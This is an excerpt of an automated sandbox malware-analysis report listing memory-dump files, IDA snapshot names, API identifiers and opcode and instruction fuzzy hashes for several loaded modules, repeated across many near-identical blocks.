                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: ba60c0eeebc9909acabafbc74b0171f350c187111526e5ed3bc653bc3641c014
                                    • Instruction ID: 4a91b7cb41a24bd193c02f9adf8e4914944ba2fc090796da43ca191683dec4cf
                                    • Opcode Fuzzy Hash: ba60c0eeebc9909acabafbc74b0171f350c187111526e5ed3bc653bc3641c014
                                    • Instruction Fuzzy Hash: 35F062AAA0978645E5539F20FCC837D7254AF847A4F4C02BADDCD566E0DF2ED9899300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 645d1527fcc94dacee6c82b3b067b51981330b18ca1c279f9a6258edabb6e225
                                    • Instruction ID: 27b1a35175c3f3aef65a4127b5aa1563cd1ec5182ba935811594a88f9037898b
                                    • Opcode Fuzzy Hash: 645d1527fcc94dacee6c82b3b067b51981330b18ca1c279f9a6258edabb6e225
                                    • Instruction Fuzzy Hash: A3F06896A0978645E5539F10FCC837D7254AF84794F4C027ADDCD566D0DF2DD9859300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 3f3e9f13db814c0e2eddc2cc6fc2c918ecb322e3b6fefbba951b30a01dba914a
                                    • Instruction ID: 5ee551cd381d2a0d47b10bbf14e2b87d13ebe6c1882688188a3dc0161c690f77
                                    • Opcode Fuzzy Hash: 3f3e9f13db814c0e2eddc2cc6fc2c918ecb322e3b6fefbba951b30a01dba914a
                                    • Instruction Fuzzy Hash: 68F0C2AAA0838645E5539F20FCC837D7254AF847A4F4C02BADDCD566E0DF2ED9898300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: ad6dc318234a6ca7b9f96324ecb256219030cf028fffc5692afb1fc5e428420e
                                    • Instruction ID: d34d752c0b201d5ae302edda61f187ebd73eaba015835b1d65eec9e65abcf0f5
                                    • Opcode Fuzzy Hash: ad6dc318234a6ca7b9f96324ecb256219030cf028fffc5692afb1fc5e428420e
                                    • Instruction Fuzzy Hash: A9F062AAA0978645E5539F20FCC837D7254BF847A4F4C02BADDCD566E0DF2ED9899300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 4cdc5e3ca1b6e8c1ccd9852d3d235b625d1b8f513883a819eeac8d32ad1ddb33
                                    • Instruction ID: 7b8d6aa6c68b2e89e66c2cc729295d9a444eeab620a9db52477f78cc97997c08
                                    • Opcode Fuzzy Hash: 4cdc5e3ca1b6e8c1ccd9852d3d235b625d1b8f513883a819eeac8d32ad1ddb33
                                    • Instruction Fuzzy Hash: 23F04FA2A0C68A42F5578F20FC453796254AF46794F440276DD5DCA6A0DEADDE499300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 6ab44bd64b2a220bb394d404525dd54336578513e0fa4932583d788d14353f37
                                    • Instruction ID: 0fbd03b4fb2fa15fba3eb090749369c6a6c2614918ea5bf58cec6215737142e0
                                    • Opcode Fuzzy Hash: 6ab44bd64b2a220bb394d404525dd54336578513e0fa4932583d788d14353f37
                                    • Instruction Fuzzy Hash: B4F04FA2A0C68A41F5578F20FC453796258AF46794F440276DD5DCA6A0DEADDE499300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 894afd399b8e7e0328f991e42cbcb520a966ad9fd02cacbcf9a430dccb6c0c06
                                    • Instruction ID: 6f3087a232d090650dc681910924efc38333b341d30b858489c2593fa2ab3263
                                    • Opcode Fuzzy Hash: 894afd399b8e7e0328f991e42cbcb520a966ad9fd02cacbcf9a430dccb6c0c06
                                    • Instruction Fuzzy Hash: 1CF04FA2A0C68A41F6578F20EC453796294BF46794F480275DD5DCA6A0DEADDE8D9300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 44ad8aaefd962aaa4904b7276fbaa43ed952a9a48d0d7d28a64918699caf23e8
                                    • Instruction ID: 3860dbd1cd2282e1871d6e62cd7273e74a3e60b2e26aa30eb9225327a113e9c4
                                    • Opcode Fuzzy Hash: 44ad8aaefd962aaa4904b7276fbaa43ed952a9a48d0d7d28a64918699caf23e8
                                    • Instruction Fuzzy Hash: 73F04FA2A0C68A41F5578F20FC453796254BF46794F440275DD5DCA6E0DEADDE4D9300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 5f5ea0f9f6c2b9098e89ad5623ce28115323a951ada21aea5d48ca5dd308e646
                                    • Instruction ID: 122cb70f7bbc310ad0d33c5f1c7ea3e2288ff93c47233ee42727bcaa3bfc0efd
                                    • Opcode Fuzzy Hash: 5f5ea0f9f6c2b9098e89ad5623ce28115323a951ada21aea5d48ca5dd308e646
                                    • Instruction Fuzzy Hash: 8CF0AFA2A0C68A41F5578F20FC413796254AF42794F440235DD1DCA2A0EEACDE498300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 89e201b1b19368985b3aff1c995b4a2cb45fbe966d6c7b92305e157478a13d57
                                    • Instruction ID: 8eefce57d6ccbc06b62d1dcc49c89e849be034ca8b3b85933f963136788dc641
                                    • Opcode Fuzzy Hash: 89e201b1b19368985b3aff1c995b4a2cb45fbe966d6c7b92305e157478a13d57
                                    • Instruction Fuzzy Hash: 71F0FC2260B346C5F652AF00B8403B5A658EF40794F8A01B6DD1D46AF0EF3DD9879310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: e5790e1096099a07d579e11ef0f4d13bdf09a54fc36628a56ccb2441b97a57be
                                    • Instruction ID: 36b4aae9ddede359af36974a60f5010af6c70272dc661f3b0ab0f503e07c23c6
                                    • Opcode Fuzzy Hash: e5790e1096099a07d579e11ef0f4d13bdf09a54fc36628a56ccb2441b97a57be
                                    • Instruction Fuzzy Hash: DAF0FC2260B346C6F651AF00B8403B5A658AF40794F8A01B6DD1D46AF0EF3DD9879310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: d0e808808f2c1d8145a85920ad2bd30bdd58a052af21d225cf43ea955842b8d4
                                    • Instruction ID: edf159b1f895b25e5ee65c888a20783461550fe63cf1c88a75e3eee2ef7fcae4
                                    • Opcode Fuzzy Hash: d0e808808f2c1d8145a85920ad2bd30bdd58a052af21d225cf43ea955842b8d4
                                    • Instruction Fuzzy Hash: 05F0FC2260B34AC5F651AF00B8403B5A658AF40794F8A02B6DD1D46AF0EF3DD9879310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 6aa2c8fc0a81520affe9af395ba30e596130cf497925ca1f2597c505522050b9
                                    • Instruction ID: ab4e2a4309594f9c2b529012e3f170abbf890958e01ad74a8ea011f23d093b03
                                    • Opcode Fuzzy Hash: 6aa2c8fc0a81520affe9af395ba30e596130cf497925ca1f2597c505522050b9
                                    • Instruction Fuzzy Hash: 7BF0FC2260B346C5F6516F00F8403B5A658BF40794F8A01B6DD1D469F0EF3DD58B9310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 941c32b5add0acf1101d6019feb9cd1a8955f554fbf27b8dee3c5fb096be2d06
                                    • Instruction ID: 9f1d0f226b9446d047f9c822b30416f0dddce9f9f4fd64c92e749e9e87582554
                                    • Opcode Fuzzy Hash: 941c32b5add0acf1101d6019feb9cd1a8955f554fbf27b8dee3c5fb096be2d06
                                    • Instruction Fuzzy Hash: 0FF0FC2260B346C5F651AF00F8403B5A258BF40794F8A42B6DD5D46AF0EF3DD98B9310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 801954a1ebe62f362fc6ccacca1ca43c400b543bf077a5860ada3d3be7abe30a
                                    • Instruction ID: eb302317a2fb924eb06e5e50444b034dcdfbc58f4311e3b88212fd3a250f32e9
                                    • Opcode Fuzzy Hash: 801954a1ebe62f362fc6ccacca1ca43c400b543bf077a5860ada3d3be7abe30a
                                    • Instruction Fuzzy Hash: C6F0F6A260978A41E5938F20FC4037D2244BF46794F4C0276DE5D5A6D0DF2DD98A8300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 1c8fa513a51aa993d352f32a08dd69f96d316f50c695c4fb9fbac1e8aa1c7746
                                    • Instruction ID: c08b1a81ebb64e7e07d49df0f7725a38c5f7d8968b21a78c38d15ca11364e6ea
                                    • Opcode Fuzzy Hash: 1c8fa513a51aa993d352f32a08dd69f96d316f50c695c4fb9fbac1e8aa1c7746
                                    • Instruction Fuzzy Hash: 60F0F6A260978E41E5938F20FC4037D2244AF46795F4C0276DE5D5A6D0EF2DD9868300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 397401bc82e67dce7063090cc41fbd15482e5dbb8bb38b517e7daf03d6cca70e
                                    • Instruction ID: c4fc027440b454a4f0e3d4be352ae0641dd60f8d2fe59d79c4fb5b265794a3a4
                                    • Opcode Fuzzy Hash: 397401bc82e67dce7063090cc41fbd15482e5dbb8bb38b517e7daf03d6cca70e
                                    • Instruction Fuzzy Hash: A4F0F6A260978A42E5938F20FC4037D6244AF46794F4C0276DE5D5A6D0DF2DD9868700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 728b1ce8a4a394d9be4054a9d6dc3bf19324a7805fff9f6115458839317820af
                                    • Instruction ID: 595b3e055becbb9741c1820fb479832c1aa6bbc0265dec7f8114152947553c7a
                                    • Opcode Fuzzy Hash: 728b1ce8a4a394d9be4054a9d6dc3bf19324a7805fff9f6115458839317820af
                                    • Instruction Fuzzy Hash: 79F096A260978A41E5938F20FC4037D6255BF46794F4C0276DE5D566D0DF2DD98A9700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
